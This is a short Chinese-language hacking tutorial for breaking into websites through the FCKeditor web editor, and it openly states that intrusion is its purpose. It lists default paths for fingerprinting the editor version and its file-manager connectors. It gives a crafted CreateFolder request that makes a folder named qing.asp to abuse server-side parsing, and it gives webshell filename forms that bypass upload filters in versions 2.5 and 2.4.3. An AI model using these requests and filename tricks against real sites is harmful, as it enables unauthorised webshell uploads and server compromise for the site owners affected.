先在这里做一个Fckeditor知识的了解:
FCKeditor是一个专门使用在网页上属于开放源代码的所见即所得文字编辑器。
现在利用其本身的开放源代码,进行一些漏洞性的入侵。当然网上也有相关知识,详细资料自己找
第一:查看编辑器版本
其相关默认路径如:
FCKeditor/_whatsnew.html
FCKeditor/editor/dialog/fck_about.html
FCKeditor/_samples/default.html
editor/filemanager/browser/default/browser.html?Connector=../../connectors/cfm/connector.cfm
editor/filemanager/connectors/asp/connector.asp
editor/filemanager/connectors/aspx/connector.aspx
editor/filemanager/connectors/php/connector.php
editor/filemanager/browser/default/browser.html
FCKeditor/editor/filemanager/connectors/asp/connector.asp?Command=CreateFolder&Type=Image&CurrentFolder=/qing.asp&NewFolderName=qing.asp后在/up_files/image/目录下创建一个明文qing.asp的文件夹。
在上面的基础下,若Fckeditor版本为2.5
木马的格式可以为
a.aspx.a;.a.aspx.jpg..jpg
若Fckeditor版本为2.4.3
php的文件名加个问号,成功上传解析
/fckeditor/editor/dialog/fck_spellerpages/spellerpages/server-scripts/spellchecker.php
支持php的通杀,2.6.4和2.6.5测试未通过
//注:在V2.65中,会发现其过滤机制是以最后一个图片格式为终点点
fckeditor/editor/plugins/bbcode/_sample/sample.html 2.64
———————————————————————————————————————